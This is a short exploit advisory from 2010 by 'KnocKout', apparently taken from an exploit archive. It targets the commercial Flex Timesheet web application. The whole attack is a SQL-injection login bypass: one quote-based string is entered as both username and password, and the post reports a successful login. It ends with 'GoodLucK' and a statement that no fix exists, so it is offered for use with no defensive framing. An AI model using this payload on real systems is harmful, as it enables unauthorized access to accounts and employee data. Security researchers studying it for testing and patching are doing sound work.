Flex Timesheet Authentication Bypass Vulnerability

2010-10-08 09:15:41

===================================================
Flex Timesheet - Authentication Bypass() Vulnerability
===================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
{ H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Flex Timesheet
~Software: http://truworthit.com/ - Price:200$
~Vulnerability Style : Authentication Bypass()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~ Explotation ~~~~~~~~~~~

bypass foR Sql-i Code()
================================
Username : 'or'h4x0reSEC
Password : 'or'h4x0reSEC
================================
[+] Logged on.



GoodLucK ;)


# Inj3ct0r.com [2010-09-28]

Fixes

No fixes

In order to submit a new fix you need to be registered.